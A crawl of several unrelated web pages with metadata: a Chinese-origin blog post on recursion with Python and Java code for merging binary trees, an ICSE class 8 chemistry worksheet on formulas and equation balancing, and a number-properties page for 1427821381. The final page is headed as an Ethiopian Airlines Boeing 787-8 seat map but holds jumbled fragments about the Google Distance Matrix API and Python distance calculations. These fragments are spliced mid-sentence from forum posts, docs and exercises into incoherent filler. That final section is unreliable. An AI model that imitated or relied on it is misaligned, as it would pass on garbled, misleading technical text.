[ null, "https://i.ytimg.com/vi/PyrDq1luGOc/hqdefault.jpg", null, "https://secure.gravatar.com/avatar/6435f23ec60904334735ba7c03f9c25d", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92173773,"math_prob":0.9003723,"size":2057,"snap":"2019-51-2020-05","text_gpt3_token_len":471,"char_repetition_ratio":0.1529469,"word_repetition_ratio":0.2647059,"special_character_ratio":0.19154108,"punctuation_ratio":0.083333336,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98344314,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,3,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-23T08:13:50Z\",\"WARC-Record-ID\":\"<urn:uuid:6def557e-ec20-4077-aacc-b2fde2eb3bcb>\",\"Content-Length\":\"50602\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7bd36ea7-26b5-46ba-9a38-f7f01ddd7dcc>\",\"WARC-Concurrent-To\":\"<urn:uuid:7846be3c-1e02-448b-b561-69d9670d2251>\",\"WARC-IP-Address\":\"104.18.42.36\",\"WARC-Target-URI\":\"https://www.difference.wiki/ancova-vs-anova/\",\"WARC-Payload-Digest\":\"sha1:M3VPSX3UI42LVCLIZAC5GRSVQXEQSEFR\",\"WARC-Block-Digest\":\"sha1:MIAEDWZ37L47KJPTUTJ537UWPU6T2AEW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250609478.50_warc_CC-MAIN-20200123071220-20200123100220-00142.warc.gz\"}"}
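The between-group / within-group decomposition that the article describes can be made concrete with a short numeric sketch. The following pure-Python one-way ANOVA F-statistic is our own illustration (the function name `one_way_anova_f` and the sample data are not from the article):

```python
def one_way_anova_f(groups):
    """One-way ANOVA: F = (between-group mean square) / (within-group mean square)."""
    all_vals = [x for g in groups for x in g]
    n_total, k = len(all_vals), len(groups)
    grand_mean = sum(all_vals) / n_total
    means = [sum(g) / len(g) for g in groups]
    # Between-group (BG) variation: spread of the group means around the grand mean
    ss_between = sum(len(g) * (m - grand_mean) ** 2 for g, m in zip(groups, means))
    # Within-group (WG) variation: spread of observations around their own group mean
    ss_within = sum((x - m) ** 2 for g, m in zip(groups, means) for x in g)
    return (ss_between / (k - 1)) / (ss_within / (n_total - k))

print(one_way_anova_f([[1, 2, 3], [2, 3, 4], [5, 6, 7]]))  # ≈ 13.0
```

A large F means the group means differ by much more than the scatter inside each group would explain; ANCOVA refines this by first removing the variance attributable to the covariates.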
http://xiantang.info/articles/2019/06/03/1559551188964.html
[ "#", null, "Xiantang's place for recording programming\n\n/\n\n## Recursion: a top-down way of thinking\n\n``````def greet2(name):\n    print(\"how are you, \" + name + \"?\")\n\ndef bye():\n    print(\"ok bye!\")\n\ndef greet(name):\n    print(\"hello, \" + name + \"!\")\n    greet2(name)\n    print(\"getting ready to say bye...\")\n    bye()\n\ngreet('maggie')\n``````", null, "", null, "", null, "", null, "", null, "``````def fact(x):\n    if x == 1:\n        return 1\n    else:\n        return x * fact(x-1)\n\na = fact(3)\nprint(a)\n``````\n\n`if x == 1: return 1` is the base case, and `else: return x * fact(x-1)` is the recursive case.", null, "617. Merge Two Binary Trees\n\n``````\tTree 1 Tree 2\n1 2\n/ \\ / \\\n3 2 1 3\n/ \\ \\\n5 4 7\n``````\n\nThe merged tree:\n\n``````\t 3\n/ \\\n4 5\n/ \\ \\\n5 4 7\n``````\n\n``````class Solution {\n    public TreeNode mergeTrees(TreeNode t1, TreeNode t2) {\n        if (t1 == null)\n            return t2;\n        if (t2 == null)\n            return t1;\n        t1.val += t2.val;\n        t1.left = mergeTrees(t1.left, t2.left);\n        t1.right = mergeTrees(t1.right, t2.right);\n        return t1;\n    }\n}\n``````" ]
[ null, "https://img.hacpai.com/file/2019/07/favicon-f0db3455.png", null, "https://img-blog.csdn.net/20180422211333306", null, "https://img-blog.csdn.net/20180422211638439", null, "https://img-blog.csdn.net/20180422211829680", null, "https://img-blog.csdn.net/20180422211925335", null, "https://img-blog.csdn.net/20180422211925335", null, "https://img-blog.csdn.net/20180422213233786", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.8903621,"math_prob":0.99737614,"size":2430,"snap":"2019-35-2019-39","text_gpt3_token_len":1840,"char_repetition_ratio":0.09356966,"word_repetition_ratio":0.019900497,"special_character_ratio":0.24320988,"punctuation_ratio":0.15430267,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97616917,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,null,null,1,null,2,null,2,null,4,null,4,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-20T22:48:25Z\",\"WARC-Record-ID\":\"<urn:uuid:a6cfcec9-ace8-44bd-a7b5-2152e1f8f39a>\",\"Content-Length\":\"32559\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b4c6e9f2-532b-4b04-aa4e-f8c3757d90ff>\",\"WARC-Concurrent-To\":\"<urn:uuid:53c58e11-9ecf-4fda-aaf0-04d3163f80f0>\",\"WARC-IP-Address\":\"144.202.121.27\",\"WARC-Target-URI\":\"http://xiantang.info/articles/2019/06/03/1559551188964.html\",\"WARC-Payload-Digest\":\"sha1:JVUEQYUZ2TDJRGULBIV55KUS7WUAMA5V\",\"WARC-Block-Digest\":\"sha1:YD47ATNRLVQKGT5HAZFVAHXTCP3DNRYH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514574084.88_warc_CC-MAIN-20190920221241-20190921003241-00172.warc.gz\"}"}
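Since the post's other examples are in Python, the same LeetCode 617 recursion can be sketched in Python too (the minimal `TreeNode` class here is our own stand-in for LeetCode's):

```python
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def merge_trees(t1, t2):
    # Base cases: if one node is missing, the merged subtree is simply the other one
    if t1 is None:
        return t2
    if t2 is None:
        return t1
    # Recursive case: overlap the two nodes, then merge the children top-down
    t1.val += t2.val
    t1.left = merge_trees(t1.left, t2.left)
    t1.right = merge_trees(t1.right, t2.right)
    return t1

# The two example trees from the post
t1 = TreeNode(1, TreeNode(3, TreeNode(5)), TreeNode(2))
t2 = TreeNode(2, TreeNode(1, None, TreeNode(4)), TreeNode(3, None, TreeNode(7)))
m = merge_trees(t1, t2)
print(m.val, m.left.val, m.right.val)  # → 3 4 5
```

This mirrors the top-down idea of the post: trust the recursive call to merge each subtree, and only handle one pair of nodes at the current level.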
https://www.pw.live/worksheet-class-8/icse-class-8-chemistry/chapter-4-basic-chemistry
[ "# ICSE Worksheet for Chapter - 4 Basic Chemistry-Terminology and Reaction Class 8\n\n## Find ICSE Worksheet for chapter-4 Basic Chemistry-Terminology and Reaction class 8\n\n1. CLASS-8\n2. BOARD: ICSE\n3. Chemistry Worksheet - 4\n4. TOPIC: Basic Chemistry-Terminology and Reaction\n5. For other ICSE Worksheets for class 8 Science, check out the main page of Physics Wallah.\n\n#### SUMMARY –\n\n• Symbols: definition, representation by John Dalton and Berzelius.\n• Meaning of symbol, radicals, valency, variable valency.\n• Molecular formula, chemical equation and its balancing.\n• Main types of chemical equations –\n1. Direct combination.\n2. Decomposition.\n3. Single displacement.\n4. Double decomposition.\n5. Reversible.\n6. Catalytic.\n7. Exothermic and endothermic.\n8. Oxidation and reduction.\n\n#### SECTION – 1\n\n1. Write the chemical names of the following compounds:\n1. Ca₃(PO₄)₂\n2. K₂CO₃\n3. KMnO₄\n4. K₂Cr₂O₇\n5. Mg(HCO₃)₂\n6. Pb(NO₃)₂\n7. BaSO₄\n8. Ag₂O\n9. (CH₃COO)₂Pb\n10. CaC₂\n2. Write the basic and acidic radicals of these compounds and then write the chemical formula.\n1. Barium sulphate\n2. Ammonium nitrate\n3. Calcium bromide\n4. Chromium sulphate\n5. Ferrous sulphide\n6. Calcium phosphate\n7. Potassium iodide\n8. Stannic oxide\n9. Calcium silicate\n10. Sodium zincate\n3. Balance the following equations:\n1. Fe + H₂O → Fe₃O₄ + H₂\n2. Ca + N₂ → Ca₃N₂\n3. Zn + KOH → K₂ZnO₂ + H₂\n4. Fe₂O₃ + CO → Fe + CO₂\n5. PbO + NH₃ → Pb + H₂O + N₂\n6. Pb₃O₄ → PbO + O₂\n7. PbS + O₂ → PbO + SO₂\n8. S + H₂SO₄ → SO₂ + H₂O\n9. S + HNO₃ → H₂SO₄ + NO₂ + H₂O\n10. MnO₂ + HCl → MnCl₂ + H₂O + Cl₂\n11. C + H₂SO₄ → CO₂ + H₂O + SO₂\n4. Write the balanced chemical equations of the following reactions.\n1. Sodium hydroxide + sulphuric acid → sodium sulphate + water\n2. Potassium bicarbonate + sulphuric acid → potassium sulphate + carbon dioxide + water\n3. Iron + sulphuric acid → ferrous sulphate + hydrogen\n4. Chlorine + sulphur dioxide + water → sulphuric acid + hydrogen chloride\n5. Silver nitrate → silver + nitrogen dioxide + oxygen\n6. Copper + nitric acid → copper nitrate + nitric oxide + water\n7. Ammonia + oxygen → nitric oxide + water\n8. Barium chloride + sulphuric acid → barium sulphate + hydrochloric acid\n9. Zinc sulphide + oxygen → zinc oxide + sulphur dioxide\n10. Aluminium carbide + water → aluminium hydroxide + methane\n\n#### SECTION – 2\n\n1. What is a symbol? What information does it convey?\n2. Sodium chloride reacts with silver nitrate to produce silver chloride and sodium nitrate.\n1. Write the equation.\n2. Check whether it is balanced; if not, balance it.\n3. Find the weights of the reactants and products.\n4. What information can be drawn from the above?\n3. What are polyatomic ions? Give two examples.\n4. Name the fundamental law which is involved in every equation.\n5. Explain the meaning of the term ‘reversible reaction’. Give three different reversible reactions, with conditions, in which two gases combine to give a gaseous product.\n6. The following reaction:\nCl₂ + H₂S → 2HCl + S\nis a redox reaction. Give reasons why.\n7. What is a catalyst? Give two examples of catalytic reactions.
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7031456,"math_prob":0.9676263,"size":3519,"snap":"2023-14-2023-23","text_gpt3_token_len":1027,"char_repetition_ratio":0.1200569,"word_repetition_ratio":0.0091883615,"special_character_ratio":0.2617221,"punctuation_ratio":0.07606679,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98325884,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-29T19:56:34Z\",\"WARC-Record-ID\":\"<urn:uuid:cd1934f9-c6a6-4f42-bca9-c5e82daa3fb2>\",\"Content-Length\":\"152238\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:04d7185d-1492-4009-b43c-9116aca3f44f>\",\"WARC-Concurrent-To\":\"<urn:uuid:80bd7082-d4c9-46ac-8adc-c019d2e04d53>\",\"WARC-IP-Address\":\"108.138.85.53\",\"WARC-Target-URI\":\"https://www.pw.live/worksheet-class-8/icse-class-8-chemistry/chapter-4-basic-chemistry\",\"WARC-Payload-Digest\":\"sha1:3777LSMQDZO5MPY5I5DB5ZIWUL7JPGKF\",\"WARC-Block-Digest\":\"sha1:RJSJMXZSMGDRYSG3U74F75ENMB5XPFIO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949025.18_warc_CC-MAIN-20230329182643-20230329212643-00708.warc.gz\"}"}
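Balancing an equation means conserving each element's atom count across the arrow. As a rough illustration of the bookkeeping behind the balancing exercises, here is a small Python sketch (the helper names and the restriction to parenthesis-free formulas are our own simplifying assumptions):

```python
import re
from collections import Counter

def atom_counts(formula, coeff=1):
    """Count atoms in a simple formula such as 'Fe3O4' (parentheses not handled)."""
    counts = Counter()
    for elem, num in re.findall(r"([A-Z][a-z]?)(\d*)", formula):
        if elem:  # skip the empty match the regex produces at the end of the string
            counts[elem] += (int(num) if num else 1) * coeff
    return counts

def is_balanced(reactants, products):
    """Each side is a list of (coefficient, formula) pairs."""
    left, right = Counter(), Counter()
    for c, f in reactants:
        left.update(atom_counts(f, c))
    for c, f in products:
        right.update(atom_counts(f, c))
    return left == right

# Equation 1 from Section 1, Q3, balanced as 3Fe + 4H2O → Fe3O4 + 4H2
print(is_balanced([(3, "Fe"), (4, "H2O")], [(1, "Fe3O4"), (4, "H2")]))  # → True
print(is_balanced([(1, "Fe"), (1, "H2O")], [(1, "Fe3O4"), (1, "H2")]))  # → False
```

The checker only verifies a proposed set of coefficients; finding the coefficients is the student's exercise.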
https://metanumbers.com/1427821381
[ "## 1427821381\n\n1,427,821,381 (one billion four hundred twenty-seven million eight hundred twenty-one thousand three hundred eighty-one) is an odd ten-digits composite number following 1427821380 and preceding 1427821382. In scientific notation, it is written as 1.427821381 × 109. The sum of its digits is 37. It has a total of 4 prime factors and 16 positive divisors. There are 1,136,070,144 positive integers (up to 1427821381) that are relatively prime to 1427821381.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Odd\n• Number length 10\n• Sum of Digits 37\n• Digital Root 1\n\n## Name\n\nShort name 1 billion 427 million 821 thousand 381 one billion four hundred twenty-seven million eight hundred twenty-one thousand three hundred eighty-one\n\n## Notation\n\nScientific notation 1.427821381 × 109 1.427821381 × 109\n\n## Prime Factorization of 1427821381\n\nPrime Factorization 7 × 17 × 73 × 164363\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 4 Total number of distinct prime factors Ω(n) 4 Total number of prime factors rad(n) 1427821381 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 1,427,821,381 is 7 × 17 × 73 × 164363. 
Since it has a total of 4 prime factors, 1,427,821,381 is a composite number.\n\n## Divisors of 1427821381\n\n16 divisors\n\n Even divisors 0 16 8 8\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 16 Total number of the positive divisors of n σ(n) 1.75146e+09 Sum of all the positive divisors of n s(n) 3.23641e+08 Sum of the proper positive divisors of n A(n) 1.09466e+08 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 37786.5 Returns the nth root of the product of n divisors H(n) 13.0435 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 1,427,821,381 can be divided by 16 positive divisors (out of which 0 are even, and 16 are odd). The sum of these divisors (counting 1,427,821,381) is 1,751,462,784, the average is 109,466,424.\n\n## Other Arithmetic Functions (n = 1427821381)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 1136070144 Total number of positive integers not greater than n that are coprime to n λ(n) 11834064 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 71240798 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 1,136,070,144 positive integers (less than 1,427,821,381) that are coprime with 1,427,821,381. 
And there are approximately 71,240,798 prime numbers less than or equal to 1,427,821,381.\n\n## Divisibility of 1427821381\n\n m n mod m 2 3 4 5 6 7 8 9 1 1 1 1 1 0 5 1\n\nThe number 1,427,821,381 is divisible by 7.\n\n## Classification of 1427821381\n\n• Arithmetic\n• Deficient\n\n• Polite\n\n• Square Free\n\n### Other numbers\n\n• LucasCarmichael\n\n## Base conversion (1427821381)\n\nBase System Value\n2 Binary 1010101000110101101001101000101\n3 Ternary 10200111200211201101\n4 Quaternary 1111012231031011\n5 Quinary 10411010241011\n6 Senary 353403100101\n8 Octal 12506551505\n10 Decimal 1427821381\n12 Duodecimal 33a211631\n16 Hexadecimal 551ad345\n20 Vigesimal 1263hd91\n36 Base36 nm3611\n\n## Basic calculations (n = 1427821381)\n\n### Multiplication\n\nn×i\n n×2 2855642762 4283464143 5711285524 7139106905\n\n### Division\n\nni\n n⁄2 7.13911e+08 4.7594e+08 3.56955e+08 2.85564e+08\n\n### Exponentiation\n\nni\n n2 2038673896040747161 2910862177653550043690849341 4156191254397959162935278843129559921 5934298736554616375603853851417330608324470901\n\n### Nth Root\n\ni√n\n 2√n 37786.5 1126.05 194.388 67.754\n\n## 1427821381 as geometric shapes\n\n### Circle\n\nRadius = n\n Diameter 2.85564e+09 8.97127e+09 6.40468e+18\n\n### Sphere\n\nRadius = n\n Volume 1.2193e+28 2.56187e+19 8.97127e+09\n\n### Square\n\nLength = n\n Perimeter 5.71129e+09 2.03867e+18 2.01924e+09\n\n### Cube\n\nLength = n\n Surface area 1.2232e+19 2.91086e+27 2.47306e+09\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 4.28346e+09 8.82772e+17 1.23653e+09\n\n### Triangular Pyramid\n\nLength = n\n Surface area 3.53109e+18 3.43048e+26 1.16581e+09\n\n## Cryptographic Hash Functions\n\nmd5 47982a45adc2b28b5608cbbdd7e85a46 0155c1db5159ace2968e54868699d6b04fd46093 741366641a8223bc9160f88557b6b414b14d9871b561ddd59be84bc36699e1f5 b399c8d3f63d4435b4370db627a3876daf7154089609cb10a048803415c5ebd8c159c5eed5848c29242ef60b55074de2e6bd5f82b09243cb58100a82db1ee9c7 0684e81fde59ce0e1bab082d5a1556643f9ee6b2" ]
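The figures quoted above (the factorisation, the 16 divisors, σ(n) and φ(n)) are easy to verify directly. A small sketch using trial division — the function names are mine, not part of the page:

```python
# Verify the arithmetic facts quoted for n = 1427821381 by trial division.
def factorize(n):
    """Return the prime factorisation of n as a dict {prime: exponent}."""
    factors = {}
    d = 2
    while d * d <= n:
        while n % d == 0:
            factors[d] = factors.get(d, 0) + 1
            n //= d
        d += 1
    if n > 1:
        factors[n] = factors.get(n, 0) + 1
    return factors

n = 1427821381
f = factorize(n)
print(f)  # {7: 1, 17: 1, 73: 1, 164363: 1}

# tau(n): number of divisors, product of (exponent + 1) over the factorisation.
tau = 1
for e in f.values():
    tau *= e + 1

# sigma(n): sum of divisors; phi(n): Euler totient, both from the factorisation.
sigma = 1
phi = 1
for p, e in f.items():
    sigma *= (p ** (e + 1) - 1) // (p - 1)
    phi *= (p - 1) * p ** (e - 1)

print(tau, sigma, phi)  # 16 1751462784 1136070144
```

The three printed values match the divisor count, sum of divisors, and totient stated in the tables above.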
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.61360997,"math_prob":0.9754525,"size":5123,"snap":"2021-21-2021-25","text_gpt3_token_len":1817,"char_repetition_ratio":0.123656966,"word_repetition_ratio":0.053008597,"special_character_ratio":0.49346086,"punctuation_ratio":0.100928076,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99561745,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-20T01:36:45Z\",\"WARC-Record-ID\":\"<urn:uuid:e31cf00d-2c2f-49db-be50-5ac28001a880>\",\"Content-Length\":\"60912\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5b52f73f-2f9e-4fd6-9983-2df56701a257>\",\"WARC-Concurrent-To\":\"<urn:uuid:3810d0cc-4e3c-4717-af1e-d5c2f9013c70>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/1427821381\",\"WARC-Payload-Digest\":\"sha1:YQ3FMFBMD5LKM2G5OYP6YF52M23VZVSE\",\"WARC-Block-Digest\":\"sha1:IVARIXXVULUABQHAHT54RF4HJ4YFEJQZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487653461.74_warc_CC-MAIN-20210619233720-20210620023720-00196.warc.gz\"}"}
http://eimearbyrnedance.com/b9hkctpt/0101df-ethiopian-airlines-boeing-787-8-seat-map
[ "# ethiopian airlines boeing 787 8 seat map\n\nI recommend using the Google Maps Distance Matrix API for this purpose. Google Map Distance Matrix API is a service that provides travel distance and time is taken to reach a destination. Calculate Euclidean distance between two points using Python. Now that the origin and destination coordinates are known, we can pass these values as parameters into the distance_matrix function to execute the API calls. We can take this formula now and translate it … fly wheels)? We are aiming to calculate the distance between coordinates in consecutive rows and store the value in a new column called ‘Distance’. In Europe, can I refuse to use Gsuite / Office365 at work? As a final step, we can write its contents to a CSV file. As per wiki definition. Thanks for contributing an answer to Stack Overflow! Instead, the optimized C version is more efficient, and we call it using the following syntax: dm = cdist(XA, XB, 'sokalsneath') Which Minkowski p-norm to use. Instead of manually doing that, I create this Maps Distance and Duration Matrix Generator from provided location longitude and latitude by using Google Maps Distance Matrix API. #python-google-distance-matrix. To learn more, see our tips on writing great answers. Asking for help, clarification, or responding to other answers. country (str or list) – Country to filter result in form of ISO 3166-1 alpha-2 country code (e.g. Since the CSV file is already loaded into the data frame, we can loop through the latitude and longitude values of each row using a function I initialized as Pairwise. Given a set of n (n > 4) points and its distances and knowing that the Menger determinant is equal to zero, how can I obtain the coordinates in R^3 of these points? You can indicate the transport mode that you wish to use. If you wish to calculate distance using other transport modes, you need to consider the accuracy of your coordinates. ... Ewoud. 
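The Distance Matrix API is queried over HTTP, so before reaching for a client library it can help to see what the raw request looks like. A hedged sketch that only builds the request URL against the documented `https://maps.googleapis.com/maps/api/distancematrix/json` endpoint — `YOUR_API_KEY` is a placeholder and nothing is actually sent:

```python
from urllib.parse import urlencode

# Build (but do not send) a Google Distance Matrix API request URL.
# The coordinates are example values; YOUR_API_KEY is a placeholder.
base = "https://maps.googleapis.com/maps/api/distancematrix/json"
params = {
    "origins": "38.9072,-77.0369",       # example origin as "lat,lng"
    "destinations": "40.7128,-74.0060",  # example destination as "lat,lng"
    "mode": "driving",
    "key": "YOUR_API_KEY",
}
url = base + "?" + urlencode(params)
print(url)
```

Pasting such a URL into a browser (with a real key) returns the JSON response that the client libraries parse for you.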
\\$\\endgroup\\$ – Spacedman Jul 28 '14 at 13:45 The arrays are not necessarily the same size. is it nature or nurture? NumPy: Array Object Exercise-103 with Solution. (Haversine formula), Fastest way to determine if an integer's square root is an integer, Shortest distance between a point and a line segment, Easy interview question got harder: given numbers 1..100, find the missing number(s) given exactly k are missing, Grouping functions (tapply, by, aggregate) and the *apply family. It is a method of changing an entity from one data type to another. Requirements. The For Loop is used in conjunction with the Pairwise helper function to iterate through the rows. python numpy euclidean distance calculation between matrices of , While you can use vectorize, @Karl's approach will be rather slow with numpy arrays. For example: xy1=numpy.array( [[ 243, 3173], [ 525, 2997]]) xy2=numpy.array( [[ … What are the earliest inventions to store and release energy (e.g. However, you want to make sure that you get the actual distance of the specific route segment that was followed (not as the crow flies). googlemaps — API for distance matrix calculations. Making statements based on opinion; back them up with references or personal experience. We have a data set with ‘Latitude’ and ‘Longitude’ values. Final Output of pairwise function is a numpy matrix which we will convert to a dataframe to view the results with City labels and as a distance matrix. Convert distance matrix to 2D projection with Python In my continuing quest to never use R again, I've been trying to figure out how to embed points described by a distance matrix into 2D. Parameters x (M, K) array_like. The full google-maps-distance.py script is below: Was there ever any actual Spaceballs merchandise? If you do not have a Google Maps API key yet, check out the link below to setup a project and get your API key: In this step, we load the CSV file into a data frame. 
Now that the origin and destination coordinates are known, we can pass these values as parameters into the distance_matrix function to execute the API calls. (Who is one?). A 1 kilometre wide sphere of U-235 appears in an orbit around our planet. Note that we transform the element 0.0 in the matrix into a large value for processing by Gaussian exp(-d^2), where d is the distance. \"\"\" Perhaps posting this to math.stackoverflow would yield better results, Using distance matrix to find coordinate points of set of points, Finding the coordinates of points from distance matrix, Podcast 302: Programming in PowerPoint can teach you a few things, Calculate distance between two latitude-longitude points? List of place name, longitude, and latitude provided on coordinate.csv file. Is there a quick way to compute this distance matrix manually? Might be a Python list of strings. your coworkers to find and share information. The API adheres to the rules of the road. In mathematics, computer science and especially graph theory, a distance matrix is a square matrix containing the distances, taken pairwise, between the elements of a set. Python scipy.spatial.distance_matrix() Examples ... \"\"\"Create the distance matrix from a set of 3D coordinates. can mac mini handle the load without eGPU? p float, 1 <= p <= infinity. How to Install GeoPy ? site design / logo © 2021 Stack Exchange Inc; user contributions licensed under cc by-sa. What exactly do you need help with? Calculate driving distance using Google Distance Matrix API in Python. You can view the full code on my GitHub page. Files for google-distance-matrix, version 0.1.8; Filename, size File type Python version Upload date Hashes; Filename, size google-distance-matrix-0.1.8.tar.gz (2.6 kB) File type Source Python version None Upload date Sep 25, 2014 Hashes View Code to retrieve information about distance matrix service from Google. Is there a quick way to compute this distance matrix manually? 
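For plain planar coordinates, the square distance matrix described above can be computed manually, without any web service. A short sketch using NumPy broadcasting, which is equivalent to `scipy.spatial.distance_matrix` for the Euclidean case — the point values are made up:

```python
import numpy as np

# Pairwise Euclidean distance matrix via broadcasting:
# diff[i, j, :] = pts[i] - pts[j], then take the norm over the last axis.
pts = np.array([[0.0, 0.0],
                [3.0, 4.0],
                [6.0, 8.0]])
diff = pts[:, None, :] - pts[None, :, :]
dm = np.sqrt((diff ** 2).sum(axis=-1))
print(dm)
# [[ 0.  5. 10.]
#  [ 5.  0.  5.]
#  [10.  5.  0.]]
```

The result is symmetric with a zero diagonal, as a distance matrix must be.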
As a result, the function above produced a dictionary with all the “distance” data for these coordinates. Use the test.py for a sample execution. – A coordinate to bias local results based on a provided location. Why do we use approximate in the present and estimated in the past? Computes the normalized Hamming distance, or the proportion of those vector elements between two n-vectors u and v which disagree. Available modes are: ‘driving”, “walking”, “transit” or “bicycling”. To calculate Euclidean distance with NumPy you can use numpy.linalg.norm:. This API returns the recommended route(not detailed) between origin and destination, which consists of duration and distance values for each pair. For each iteration in the loop, latitude and longitude values are stored as pairs in the ‘origin’ and ‘destination’ variables, respectively. bbox (list or tuple of 2 items of geopy.point.Point or (latitude, longitude) or \"%(latitude)s, %(longitude)s\".) Why? \\$\\begingroup\\$ You need to find an algorithm that takes a pre-computed distance matrix or allows you to supply a distance-function that it can call when it needs to compute distances. replace text with part of text using regex with bash perl. GeoPy is a Python library that makes geographical calculations easier for the users. Compute the distance matrix. This means, that if there is a slight chance that your coordinates are off by a few meters, the API may consider the coordinate in a oncoming traffic lane (especially on highways). Final Output of pairwise function is a numpy matrix which we will convert to a dataframe to view the results with City labels and as a distance matrix. That’s it. This can be done with several manifold embeddings provided by scikit-learn . The basic idea is to add one point at a time that satisfies the distance constraints for (up to four) previous points. Python Exercises, Practice and Solution: Write a Python program to compute the distance between the points (x1, y1) and (x2, y2). 
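The dictionary produced for each origin/destination pair follows the API's `rows`/`elements` layout, where each element carries `distance` and `duration` objects with a human-readable `text` and a numeric `value`. A sketch of pulling the distance in metres out of a mocked response — the numbers below are invented for illustration, not a real API result:

```python
# Minimal, mocked Distance Matrix API-style response.
response = {
    "status": "OK",
    "rows": [
        {"elements": [
            {"status": "OK",
             "distance": {"text": "361 km", "value": 361000},
             "duration": {"text": "3 hours 51 mins", "value": 13860}}
        ]}
    ],
}

def element_distance_m(resp, row=0, col=0):
    """Distance in metres for one origin/destination pair, or None."""
    elem = resp["rows"][row]["elements"][col]
    if elem.get("status") != "OK":
        return None
    return elem["distance"]["value"]

print(element_distance_m(response))  # 361000
```

Checking the per-element `status` before reading values matters in practice, since individual pairs can fail even when the overall request succeeds.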
Get started. You access the Distance Matrix API through an HTTP interface, with requests constructed as a URL string, using origins and destinations, along with your API key.The following example requests the distance matrix data between Washington, DC and New York City, NY, in JSON format:Try it! Distance Matrix. If you have any suggestions, feel free to comment below or contact me on LinkedIn. The pairwise function is using a helper function from the itertools package, called tee. Write a NumPy program to calculate the Euclidean distance. This API returns the recommended route(not detailed) between origin and destination, which consists of duration and distance values for each pair. Follow. I can set one of these points in the coordinate (0,0) to simpify, and find the others. I have two arrays of x-y coordinates, and I would like to find the minimum Euclidean distance between each point in one array with all the points in the other array. Similarly, we can get information about the distance or drive time between locations using the Google Maps Distance Matrix API. Perform Principal Coordinate Analysis. Python Exercises, Practice and Solution: Write a Python program to compute the distance between the points (x1, y1) and (x2, y2). Computes the Jaccard distance between the points. ... we will now create a dictionary with all the information available through Google Distance Matrix API between two coordinates: d_goog = gmap.distance_matrix(p_1, p_2, mode='driving') prnt(d_goog) I have a set of points (with unknow coordinates) and the distance matrix. So, the easiest way to perform this task is to make use of a mapping web service or API that can do all the grunt work. FR). You want to calculate the distance between each pair of coordinates in consecutive rows. I have downloaded a sample data set made available on the UCI Machine Learning Repository. An empty list item is created to store the calculated distances. 
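The `pairwise` helper mentioned above can be written with `itertools.tee`, which splits one iterator into two so consecutive rows can be walked in lockstep. A sketch (since Python 3.10 the same helper also ships in the standard library as `itertools.pairwise`):

```python
from itertools import tee

def pairwise(iterable):
    """s -> (s0, s1), (s1, s2), (s2, s3), ..."""
    a, b = tee(iterable)
    next(b, None)  # advance the second iterator by one element
    return zip(a, b)

# Consecutive (origin, destination) pairs from a list of coordinates.
coords = [(52.0, 4.3), (52.1, 4.4), (52.2, 4.5)]
for origin, destination in pairwise(coords):
    print(origin, "->", destination)
# (52.0, 4.3) -> (52.1, 4.4)
# (52.1, 4.4) -> (52.2, 4.5)
```

Each loop iteration then supplies one origin/destination pair for a distance lookup.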
